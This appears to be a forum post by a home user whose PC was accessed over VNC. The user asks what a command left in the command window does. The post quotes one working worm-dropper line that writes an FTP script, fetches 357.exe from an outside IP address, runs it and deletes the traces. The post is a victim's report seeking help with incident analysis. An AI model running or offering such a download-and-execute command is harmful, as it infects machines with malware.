I was trouble shooting a time out issue with my internet connection. During this process I disconnected my switch, then I took my router of the mix. At this point , my PC was connected directly to my DSL modem. After 15 minutes past I walked away from my pc for 2 minutes. I came back to find my VNC icon Black, which means someon was connected, and my Symantec Auto Protect box up on the screen. I immediatly closed the VNC session. I then went to run a netstat to see if someone was connected and noticed this string in the command window.
cmd.exe /c del i&echo open 220.127.116.11 12680 > i&echo user 1 1 >> i &echo get 357.exe >> i &echo quit >> i &ftp -n -s:i &357.exe&del i&exit
That same IP address was the ip address that connected to my computer via VNC. I found it on the event viewer.
I then checked the symantec log and it shows that it blocked the w32.spybot.worm. Here is what I am guessing.
This bunghole connected to my machine, someone how got into my VNC, and attempted to download a virus, but Norton caught it.
Can anyone tell me for sure what the above command does?